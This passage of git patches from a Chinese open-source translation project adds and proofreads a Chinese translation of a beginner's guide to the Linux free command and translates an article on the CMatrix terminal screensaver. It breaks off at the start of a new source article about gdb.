-[a]:https://www.howtoforge.com
-[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
-[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
-[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
-[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
-[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
-[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
-[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
-[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
-[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
-[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
-[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
-[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
-[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
-[14]:https://linux.die.net/man/1/free
From 0fb3f8b07cd89ac316c69015d507275ec7a851df Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 19:33:26 +0800
Subject: [PATCH 293/371] 20170925 Linux Free Command Explained for Beginners
(6 Examples).md
---
...nd Explained for Beginners (6 Examples).md | 135 ++++++++++++++++++
1 file changed, 135 insertions(+)
create mode 100644 translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
diff --git a/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
new file mode 100644
index 0000000000..279bd0e75d
--- /dev/null
+++ b/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
@@ -0,0 +1,135 @@
+6 个例子让初学者掌握 free 命令
+======
+
+在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:**free**。
+
+在本文中,我们会讲到 free 命令的基本用法以及它所提供的一些重要的功能。文中提到的所有命令和用法都是在 Ubuntu 16.04LTS 上测试过的。
+
+### Linux free 命令
+
+让我们看一下 free 命令的语法:
+
+free [options]
+
+free 命令的 man 手册如是说:
+
+```
+free 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 /proc/meminfo 中得到的。
+```
+
+接下来我们用问答的方式了解一下 free 命令是怎么工作的。
+
+### Q1. 怎么用 free 命令查看已使用和未使用的内存?
+
+这很容易,您只需不加任何参数地运行 free 这条命令就可以了:
+
+free
+
+这是 free 命令在我的系统上的输出:
+
+[![view used and available memory using free command][1]][2]
+
+这些列是什么意思呢?
+
+[![Free command columns][3]][4]
+
+total - 安装的内存的总量(等同于 /proc/meminfo 中的 MemTotal 和 SwapTotal)
+
+used - 已使用的内存(计算公式为:total - free - buffers - cache)
+
+free - 未被使用的内存(等同于 /proc/meminfo 中的 MemFree 和 SwapFree)
+
+shared - 通常是临时文件系统使用的内存(等同于 /proc/meminfo 中的 Shmem;在内核 2.6.32 版本上生效,参数无效则显示为 0)
+
+buffers - 内核缓冲区使用的内存(等同于 /proc/meminfo 中的 Buffers)
+
+cache - 页面缓存和 Slab 分配机制使用的内存(等同于 /proc/meminfo 中的 Cached 和 Slab)
+
+buff/cache - buffers 与 cache 之和
+
+available - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 cache 或者 free 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 /proc/meminfo 中的 MemAvailable;在内核 3.14 版本上生效,从内核 2.6.27 版本开始仿真;在其他版本上这个值与 free 这一列相同)
+
+### Q2. 如何更改显示的单位呢?
+
+如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 **-m** 这个参数:
+
+free -m
+
+[![free command display metrics change][5]][6]
+
+同样地,你可以用 **-b** 以字节显示、**-k** 以 KB 显示、**-m** 以 MB 显示、**-g** 以 GB 显示、**\--tera** 以 TB 显示。
+
+### Q3. 怎么显示可读的结果呢?
+
+free 命令提供了 **-h** 这个参数使输出转化为可读的格式。
+
+free -h
+
+用这个参数,free 命令会自己决定用什么单位显示内存的每个数值。例如:
+
+[![diplsy data fromm free command in human readable form][7]][8]
+
+### Q4. 怎么让 free 命令以一定的时间间隔持续运行?
+
+您可以用 **-s** 这个参数让 free 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
+
+例如,使 free 命令每隔 3 秒执行一次:
+
+free -s 3
+
+如果您需要 free 命令只执行几次,您可以用 **-c** 这个参数指定执行的次数:
+
+free -s 3 -c 5
+
+上面这条命令可以确保 free 命令每隔 3 秒执行一次,总共执行 5 次。
+
+**注**:这个功能目前在Ubuntu系统上还存在 [问题][9],所以并未测试。
+
+### Q5. 怎么使 free 基于 1000 计算内存,而不是 1024?
+
+如果您指定 free 用 MB 来显示内存(用 -m 参数),但又想基于 1000 来计算结果,可以用 **\--sj** 这个参数来实现。下图展示了用与不用这个参数的结果:
+
+[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
+
+### Q6. 如何使 free 命令显示每一列的总和?
+
+如果您想要 free 命令显示每一列的总和,你可以用 **-t** 这个参数。
+
+free -t
+
+如下图所示:
+
+[![How to make free display total of columns][12]][13]
+
+请注意 “Total” 这一行出现了。
+
+### 总结
+
+free 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-free-command/
+
+作者:[Himanshu Arora][a]
+译者:[jessie-pang](https://github.com/jessie-pang)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/images/linux_free_command/free-command-output.png
+[2]:https://www.howtoforge.com/images/linux_free_command/big/free-command-output.png
+[3]:https://www.howtoforge.com/images/linux_free_command/free-output-columns.png
+[4]:https://www.howtoforge.com/images/linux_free_command/big/free-output-columns.png
+[5]:https://www.howtoforge.com/images/linux_free_command/free-m-option.png
+[6]:https://www.howtoforge.com/images/linux_free_command/big/free-m-option.png
+[7]:https://www.howtoforge.com/images/linux_free_command/free-h.png
+[8]:https://www.howtoforge.com/images/linux_free_command/big/free-h.png
+[9]:https://bugs.launchpad.net/ubuntu/+source/procps/+bug/1551731
+[10]:https://www.howtoforge.com/images/linux_free_command/free-si-option.png
+[11]:https://www.howtoforge.com/images/linux_free_command/big/free-si-option.png
+[12]:https://www.howtoforge.com/images/linux_free_command/free-t-option.png
+[13]:https://www.howtoforge.com/images/linux_free_command/big/free-t-option.png
+[14]:https://linux.die.net/man/1/free
From 4318609f36c7141b4a0be82601ebf1132d10f409 Mon Sep 17 00:00:00 2001
From: jessie-pang <35220454+jessie-pang@users.noreply.github.com>
Date: Sat, 13 Jan 2018 19:48:41 +0800
Subject: [PATCH 294/371] Update 20170921 Mastering file searches on Linux.md
---
sources/tech/20170921 Mastering file searches on Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20170921 Mastering file searches on Linux.md b/sources/tech/20170921 Mastering file searches on Linux.md
index 80fde0f7f0..524585003c 100644
--- a/sources/tech/20170921 Mastering file searches on Linux.md
+++ b/sources/tech/20170921 Mastering file searches on Linux.md
@@ -1,3 +1,5 @@
+Translating by jessie-pang
+
Mastering file searches on Linux
======
From 9bd98b1742d38f53ce01394d2ba79aa254f518e9 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 13 Jan 2018 20:35:15 +0800
Subject: [PATCH 295/371] Delete 20180103 Linux-Unix desktop fun- Simulates the
display from -The Matrix.md
---
... Simulates the display from -The Matrix.md | 115 ------------------
1 file changed, 115 deletions(-)
delete mode 100644 sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
diff --git a/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md b/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
deleted file mode 100644
index 5c73a7458c..0000000000
--- a/sources/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
+++ /dev/null
@@ -1,115 +0,0 @@
-translating by CYLeft
-
-Linux/Unix desktop fun: Simulates the display from “The Matrix”
-======
-The Matrix is a science fiction action movie from 1999. It was written and directed by the Wachowski Brothers. The film has falling green characters on screen. The digital rain is representing the activity of the virtual reality in "The Matrix." You can now have Matrix digital rain with CMatrix on a Linux or Unix terminal too.
-
-
-## Install cmatrix
-
-Install and setup CMatrix as per your Linux/Unix version.
-
-### How to install cmatrix on a Debian/Ubuntu Linux
-
-Type the following [apt-get command][1]/[apt command][2] on a Debian/Ubuntu/Mint Linux:
-`$ sudo apt install cmatrix`
-Sample outputs:
-```
-[sudo] password for vivek:
-Reading package lists... Done
-Building dependency tree
-Reading state information... Done
-Suggested packages:
- cmatrix-xfont
-The following NEW packages will be installed:
- cmatrix
-0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
-Need to get 15.8 kB of archives.
-After this operation, 50.2 kB of additional disk space will be used.
-Get:1 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 cmatrix amd64 1.2a-5build2 [15.8 kB]
-Fetched 15.8 kB in 0s (19.7 kB/s)
-Selecting previously unselected package cmatrix.
-(Reading database ... 205388 files and directories currently installed.)
-Preparing to unpack .../cmatrix_1.2a-5build2_amd64.deb ...
-Unpacking cmatrix (1.2a-5build2) ...
-Setting up cmatrix (1.2a-5build2) ...
-Processing triggers for man-db (2.7.6.1-2) ...
-```
-
-### How to install cmatrix on an Arch Linux
-
-Type the following pacman command:
-`$ sudo pacman -S cmatrix`
-
-### How to install cmatrix on a FreeBSD system
-
-To install the port run:
-`# cd /usr/ports/misc/cmatrix/ && make install clean`
-OR add the binary package using the pkg command
-`# pkg install cmatrix`
-
-### How to install cmatrix on a macOS Unix
-
-Type the following brew command:
-`$ brew install cmatrix`
-
-### How to install cmatrix on a OpenBSD
-
-Type the following pkg_add command:
-`# pkg_add cmatrix`
-
-## Using cmatrix
-
-Simply type the command:
-`$ cmatrix`
-[![cmtarix in action][3]][3]
-
-### Using keyboard
-
-The following keystrokes are available during execution (unavailable in -s mode):
-| KEYSTROKES | Description |
-| a | Toggle asynchronous scroll |
-| b | Random bold characters |
-| B | All bold characters |
-| n | Turn off bold characters |
-| 0-9 | Adjust update speed |
-| ! @ # $ % ^ & ) | Change the color of the matrix to the corresponding color: ! – red, @ –
-green, # – yellow, $ – blue, % – magenta, ^ – cyan, & – white, ) – black. |
-| q | Quit the program |
-
-You can pass the following option to the cmatrix command:
-`$ cmatrix -h`
-Sample outputs:
-```
--a: Asynchronous scroll
- -b: Bold characters on
- -B: All bold characters (overrides -b)
- -f: Force the linux $TERM type to be on
- -l: Linux mode (uses matrix console font)
- -o: Use old-style scrolling
- -h: Print usage and exit
- -n: No bold characters (overrides -b and -B, default)
- -s: "Screensaver" mode, exits on first keystroke
- -x: X window mode, use if your xterm is using mtx.pcf
- -V: Print version information and exit
- -u delay (0 - 10, default 4): Screen update delay
- -C [color]: Use this color for matrix (default green)
-```
-
-You now have the coolest terminal app!
-
-
---------------------------------------------------------------------------------
-
-via: https://www.cyberciti.biz/open-source/command-line-hacks/matrix-digital-rain-on-linux-macos-unix-terminal/
-
-作者:[][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.cyberciti.biz
-[1]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
-[2]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
-[3]:https://www.cyberciti.biz/media/new/cms/2018/01/small-cmtarix-file.gif
From b526926b288b0971edc6dca385b9c61c7fe991cc Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 13 Jan 2018 20:36:21 +0800
Subject: [PATCH 296/371] translated by cyleft
Linux-Unix desktop fun- Simulates the display from -The Matrix2
---
... Simulates the display from -The Matrix.md | 111 ++++++++++++++++++
1 file changed, 111 insertions(+)
create mode 100644 translated/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
diff --git a/translated/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md b/translated/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
new file mode 100644
index 0000000000..7a3a6b6207
--- /dev/null
+++ b/translated/tech/20180103 Linux-Unix desktop fun- Simulates the display from -The Matrix.md
@@ -0,0 +1,111 @@
+Linux/Unix 桌面趣事:模拟《黑客帝国》的屏幕效果
+======
+《黑客帝国》是 1999 年由沃卓斯基(Wachowski)兄弟编剧并执导的科幻动作片。影片中的屏幕上不断有绿色字符落下,这种“数字雨”表现的是《黑客帝国》里虚拟现实世界中的活动。现在,借助 CMatrix,你也可以在 Linux 或 Unix 终端上看到这样的数字雨。
+
+## 安装 cmatrix
+
+请根据你所用的 Linux/Unix 版本安装并设置 CMatrix。
+
+### 如何在 Debian/Ubuntu Linux 发行版中安装 cmatrix
+
+在 Debian/Ubuntu/Mint Linux 中键入以下 [apt-get 命令][1]/[apt 命令][2]:
+`$ sudo apt install cmatrix`
+示例输出:
+```
+[sudo] password for vivek:
+Reading package lists... Done
+Building dependency tree
+Reading state information... Done
+Suggested packages:
+ cmatrix-xfont
+The following NEW packages will be installed:
+ cmatrix
+0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
+Need to get 15.8 kB of archives.
+After this operation, 50.2 kB of additional disk space will be used.
+Get:1 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 cmatrix amd64 1.2a-5build2 [15.8 kB]
+Fetched 15.8 kB in 0s (19.7 kB/s)
+Selecting previously unselected package cmatrix.
+(Reading database ... 205388 files and directories currently installed.)
+Preparing to unpack .../cmatrix_1.2a-5build2_amd64.deb ...
+Unpacking cmatrix (1.2a-5build2) ...
+Setting up cmatrix (1.2a-5build2) ...
+Processing triggers for man-db (2.7.6.1-2) ...
+```
+
+### 如何在 Arch Linux 发行版安装 cmatrix
+
+键入 pacman 命令:
+`$ sudo pacman -S cmatrix`
+
+### 如何在 FreeBSD 系统中安装 cmatrix
+
+要通过 port 来安装,请运行:
+`# cd /usr/ports/misc/cmatrix/ && make install clean`
+或者使用 pkg 命令添加二进制包
+`# pkg install cmatrix`
+
+### 如何在 macOS Unix 系统中安装 cmatrix
+
+键入下列 brew 命令:
+`$ brew install cmatrix`
+
+### 如何在 OpenBSD 系统中安装 cmatrix
+
+键入 pkg_add 命令:
+`# pkg_add cmatrix`
+
+## 使用 cmatrix
+
+只需键入如下命令:
+`$ cmatrix`
+[![cmtarix 运转中][3]][3]
+
+### 使用键盘
+
+在执行期间,下列按键有效(-s 模式下,按键无效):
+| 按键 | 说明 |
+| --- | --- |
+| a | 切换异步滚动 |
+| b | 随机字符加粗 |
+| B | 全部字符加粗 |
+| n | 关闭字符加粗 |
+| 0-9 | 调整更新速度 |
+| ! @ # $ % ^ & ) | 将矩阵改变为对应的颜色:! – 红、@ – 绿、# – 黄、$ – 蓝、% – 洋红、^ – 青、& – 白、) – 黑 |
+| q | 退出程序 |
+
+你可以通过以下命令获取 cmatrix 选项:
+`$ cmatrix -h`
+示例输出:
+```
+-a: 异步滚动
+ -b: 开启字符加粗
+ -B: 所有字符加粗(优先于 -b 选项)
+ -f: 强制开启 Linux $TERM 模式
+ -l: Linux 模式(使用 matrix 控制台字体)
+ -o: 启用旧式滚动
+ -h: 输出使用说明并退出
+ -n: 关闭字符加粗(优先于 -b 和 -B,默认)
+ -s: “屏保”模式,第一次按键时退出
+ -x: X 窗口模式,如果你的 xterm 使用的是 mtx.pcf 字体,则使用此选项
+ -V: 输出版本信息并且退出
+ -u delay (0 - 10, default 4): 屏幕更新延时
+ -C [color]: 调整 matrix 颜色(默认绿色)
+```
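+
+举个例子(仅作演示,选项可按喜好组合),下面的命令会以红色、全部加粗的“屏保”模式运行,按任意键即退出:
+
+```
+$ cmatrix -B -s -C red
+```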
+
+现在,你拥有了一款最炫酷的终端软件!
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/open-source/command-line-hacks/matrix-digital-rain-on-linux-macos-unix-terminal/
+
+作者:[][a]
+译者:[CYLeft](https://github.com/CYLeft)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
+[2]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
+[3]:https://www.cyberciti.biz/media/new/cms/2018/01/small-cmtarix-file.gif
From 187532a62a89d718ffeb483d10a361099d14ff6d Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 20:29:11 +0800
Subject: [PATCH 297/371] PRF:20170925 Linux Free Command Explained for
Beginners (6 Examples).md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@jessie-pang 恭喜你,完成了第一篇翻译。用心了。本次校对大多是调整了一些格式,可以参考。
---
...nd Explained for Beginners (6 Examples).md | 91 ++++++++++---------
1 file changed, 48 insertions(+), 43 deletions(-)
diff --git a/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
index 279bd0e75d..6e810f9f28 100644
--- a/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
+++ b/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
@@ -1,31 +1,33 @@
6 个例子让初学者掌握 free 命令
======
-在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:**free**。
+在 Linux 系统上,有时你可能想从命令行快速地了解系统的已使用和未使用的内存空间。如果你是一个 Linux 新手,有个好消息:有一条系统内置的命令可以显示这些信息:`free`。
在本文中,我们会讲到 free 命令的基本用法以及它所提供的一些重要的功能。文中提到的所有命令和用法都是在 Ubuntu 16.04LTS 上测试过的。
### Linux free 命令
-让我们看一下 free 命令的语法:
-
+让我们看一下 `free` 命令的语法:
+
+```
free [options]
+```
free 命令的 man 手册如是说:
-```
-free 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 /proc/meminfo 中得到的。
-```
+> `free` 命令显示了系统的可用和已用的物理内存及交换内存的总量,以及内核用到的缓存空间。这些信息是从 `/proc/meminfo` 中得到的。
-接下来我们用问答的方式了解一下 free 命令是怎么工作的。
+接下来我们用问答的方式了解一下 `free` 命令是怎么工作的。
### Q1. 怎么用 free 命令查看已使用和未使用的内存?
-这很容易,您只需不加任何参数地运行 free 这条命令就可以了:
-
+这很容易,您只需不加任何参数地运行 `free` 这条命令就可以了:
+
+```
free
+```
-这是 free 命令在我的系统上的输出:
+这是 `free` 命令在我的系统上的输出:
[![view used and available memory using free command][1]][2]
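
如果不方便查看截图,`free` 的输出格式大致如下(数值为虚构的示例,单位为 KB):

```
              total        used        free      shared  buff/cache   available
Mem:        8066276     2547300     1784596      368436     3734380     4851788
Swap:       2097148           0     2097148
```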
@@ -33,79 +35,82 @@ free
[![Free command columns][3]][4]
-total - 安装的内存的总量(等同于 /proc/meminfo 中的 MemTotal 和 SwapTotal)
-
-used - 已使用的内存(计算公式为:total - free - buffers - cache)
-
-free - 未被使用的内存(等同于 /proc/meminfo 中的 MemFree 和 SwapFree)
-
-shared - 通常是临时文件系统使用的内存(等同于 /proc/meminfo 中的 Shmem;在内核 2.6.32 版本上生效,参数无效则显示为 0)
-
-buffers - 内核缓冲区使用的内存(等同于 /proc/meminfo 中的 Buffers)
-
-cache - 页面缓存和 Slab 分配机制使用的内存(等同于 /proc/meminfo 中的 Cached 和 Slab)
-
-buff/cache - buffers 与 cache 之和
-
-available - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 cache 或者 free 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 /proc/meminfo 中的 MemAvailable;在内核 3.14 版本上生效,从内核 2.6.27 版本开始仿真;在其他版本上这个值与 free 这一列相同)
+- `total` - 安装的内存的总量(等同于 `/proc/meminfo` 中的 `MemTotal` 和 `SwapTotal`)
+- `used` - 已使用的内存(计算公式为:`used` = `total` - `free` - `buffers` - `cache`)
+- `free` - 未被使用的内存(等同于 `/proc/meminfo` 中的 `MemFree` 和 `SwapFree`)
+- `shared` - 通常是临时文件系统使用的内存(等同于 `/proc/meminfo` 中的 `Shmem`;自内核 2.6.32 版本可用,不可用则显示为 `0`)
+- `buffers` - 内核缓冲区使用的内存(等同于 `/proc/meminfo` 中的 `Buffers`)
+- `cache` - 页面缓存和 Slab 分配机制使用的内存(等同于 `/proc/meminfo` 中的 `Cached` 和 `Slab`)
+- `buff/cache` - `buffers` 与 `cache` 之和
+- `available` - 在不计算交换空间的情况下,预计可以被新启动的应用程序所使用的内存空间。与 `cache` 或者 `free` 部分不同,这一列把页面缓存计算在内,并且不是所有的可回收的 slab 内存都可以真正被回收,因为可能有被占用的部分。(等同于 `/proc/meminfo` 中的 `MemAvailable`;自内核 3.14 版本可用,自内核 2.6.27 版本开始模拟;在其他版本上这个值与 `free` 这一列相同)
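+
+以前面那份虚构的示例输出为例,可以验证一下 `used` 这一列的计算公式:8066276 - 1784596 - 3734380 = 2547300,正好等于 `used` 列显示的值。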
### Q2. 如何更改显示的单位呢?
-如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 **-m** 这个参数:
-
+如果需要的话,你可以更改内存的显示单位。比如说,想要内存以兆为单位显示,你可以用 `-m` 这个参数:
+
+```
free -m
+```
[![free command display metrics change][5]][6]
-同样地,你可以用 **-b** 以字节显示、**-k** 以 KB 显示、**-m** 以 MB 显示、**-g** 以 GB 显示、**\--tera** 以 TB 显示。
+同样地,你可以用 `-b` 以字节显示、`-k` 以 KB 显示、`-m` 以 MB 显示、`-g` 以 GB 显示、`--tera` 以 TB 显示。
### Q3. 怎么显示可读的结果呢?
-free 命令提供了 **-h** 这个参数使输出转化为可读的格式。
+`free` 命令提供了 `-h` 这个参数使输出转化为可读的格式。
+```
free -h
+```
-用这个参数,free 命令会自己决定用什么单位显示内存的每个数值。例如:
+用这个参数,`free` 命令会自己决定用什么单位显示内存的每个数值。例如:
[![diplsy data fromm free command in human readable form][7]][8]
### Q4. 怎么让 free 命令以一定的时间间隔持续运行?
-您可以用 **-s** 这个参数让 free 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
-
-例如,使 free 命令每隔 3 秒执行一次:
+您可以用 `-s` 这个参数让 `free` 命令以一定的时间间隔持续地执行。您需要传递给命令行一个数字参数,做为这个时间间隔的秒数。
+例如,使 `free` 命令每隔 3 秒执行一次:
+
+```
free -s 3
+```
-如果您需要 free 命令只执行几次,您可以用 **-c** 这个参数指定执行的次数:
-
+如果您需要 `free` 命令只执行几次,您可以用 `-c` 这个参数指定执行的次数:
+
+```
free -s 3 -c 5
+```
-上面这条命令可以确保 free 命令每隔 3 秒执行一次,总共执行 5 次。
+上面这条命令可以确保 `free` 命令每隔 3 秒执行一次,总共执行 5 次。
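+
+作为补充(这不是 `free` 自带的功能),如果只是想周期性地刷新输出,也可以借助 `watch` 命令达到类似效果:
+
+```
+watch -n 3 free -h
+```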
-**注**:这个功能目前在Ubuntu系统上还存在 [问题][9],所以并未测试。
+注:这个功能目前在 Ubuntu 系统上还存在 [问题][9],所以并未测试。
### Q5. 怎么使 free 基于 1000 计算内存,而不是 1024?
-如果您指定 free 用 MB 来显示内存(用 -m 参数),但又想基于 1000 来计算结果,可以用 **\--sj** 这个参数来实现。下图展示了用与不用这个参数的结果:
+如果您指定 `free` 用 MB 来显示内存(用 `-m` 参数),但又想基于 1000 来计算结果,可以用 `--si` 这个参数来实现。下图展示了用与不用这个参数的结果:
[![How to make free use power of 1000 \(not 1024\) while displaying memory figures][10]][11]
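
也就是说,结合前面的参数,完整的命令大致是(示例):

```
free -m --si
```
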
### Q6. 如何使 free 命令显示每一列的总和?
-如果您想要 free 命令显示每一列的总和,你可以用 **-t** 这个参数。
-
+如果您想要 `free` 命令显示每一列的总和,你可以用 `-t` 这个参数。
+
+```
free -t
+```
如下图所示:
[![How to make free display total of columns][12]][13]
-请注意 “Total” 这一行出现了。
+请注意 `Total` 这一行出现了。
### 总结
-free 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
+`free` 命令对于系统管理来讲是个极其有用的工具。它有很多参数可以定制化您的输出,易懂易用。我们在本文中也提到了很多有用的参数。练习完之后,请您移步至 [man 手册][14]了解更多内容。
--------------------------------------------------------------------------------
@@ -114,7 +119,7 @@ via: https://www.howtoforge.com/linux-free-command/
作者:[Himanshu Arora][a]
译者:[jessie-pang](https://github.com/jessie-pang)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From c9b3dd685512e90da27b3602a795a03039d0609a Mon Sep 17 00:00:00 2001
From: wxy
Date: Sat, 13 Jan 2018 20:40:36 +0800
Subject: [PATCH 298/371] PUB:20170925 Linux Free Command Explained for
Beginners (6 Examples).md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@jessie-pang 文章首发地址: https://linux.cn/article-9232-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/jessie-pang
加油!
---
...925 Linux Free Command Explained for Beginners (6 Examples).md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20170925 Linux Free Command Explained for Beginners (6 Examples).md (100%)
diff --git a/translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md b/published/20170925 Linux Free Command Explained for Beginners (6 Examples).md
similarity index 100%
rename from translated/tech/20170925 Linux Free Command Explained for Beginners (6 Examples).md
rename to published/20170925 Linux Free Command Explained for Beginners (6 Examples).md
From 9ff33728b03b11e6a5c1af612b1bfb5532a722ea Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 13 Jan 2018 20:58:07 +0800
Subject: [PATCH 299/371] Update 20180102 10 Reasons Why Linux Is Better Than
Windows.md
---
.../tech/20180102 10 Reasons Why Linux Is Better Than Windows.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20180102 10 Reasons Why Linux Is Better Than Windows.md b/sources/tech/20180102 10 Reasons Why Linux Is Better Than Windows.md
index d5bf605ddb..65dcd946f0 100644
--- a/sources/tech/20180102 10 Reasons Why Linux Is Better Than Windows.md
+++ b/sources/tech/20180102 10 Reasons Why Linux Is Better Than Windows.md
@@ -1,3 +1,4 @@
+translate by cyleft
10 Reasons Why Linux Is Better Than Windows
======
It is often seen that people get confused over choosing Windows or Linux as host operating system in both
From d10a7b9fc0dd17ffce42410abcca07d003a1981f Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sat, 13 Jan 2018 21:01:50 +0800
Subject: [PATCH 300/371] apply for translation
---
.../20171207 How To Find Files Based On their Permissions.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20171207 How To Find Files Based On their Permissions.md b/sources/tech/20171207 How To Find Files Based On their Permissions.md
index ec8f17e296..d9e6ecc95a 100644
--- a/sources/tech/20171207 How To Find Files Based On their Permissions.md
+++ b/sources/tech/20171207 How To Find Files Based On their Permissions.md
@@ -1,3 +1,4 @@
+translated by cyleft
How To Find Files Based On their Permissions
======
Finding files in Linux is not a big deal. There are plenty of free and open source graphical utilities available on the market. In my opinion, finding files from command line is much easier and faster. We already knew how to [**find and sort files based on access and modification date and time**][1]. Today, we will see how to find files based on their permissions in Unix-like operating systems.
From ef1ffa576d65c618322a2926be598901d995c2ff Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sat, 13 Jan 2018 21:33:58 +0800
Subject: [PATCH 301/371] =?UTF-8?q?20180113-1=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20180104 \tHow does gdb call functions.md" | 252 ++++++++++++++++++
1 file changed, 252 insertions(+)
create mode 100644 "sources/tech/20180104 \tHow does gdb call functions.md"
diff --git "a/sources/tech/20180104 \tHow does gdb call functions.md" "b/sources/tech/20180104 \tHow does gdb call functions.md"
new file mode 100644
index 0000000000..a62b30ea31
--- /dev/null
+++ "b/sources/tech/20180104 \tHow does gdb call functions.md"
@@ -0,0 +1,252 @@
+How does gdb call functions?
+============================================================
+
+(previous gdb posts: [how does gdb work? (2016)][4] and [three things you can do with gdb (2014)][5])
+
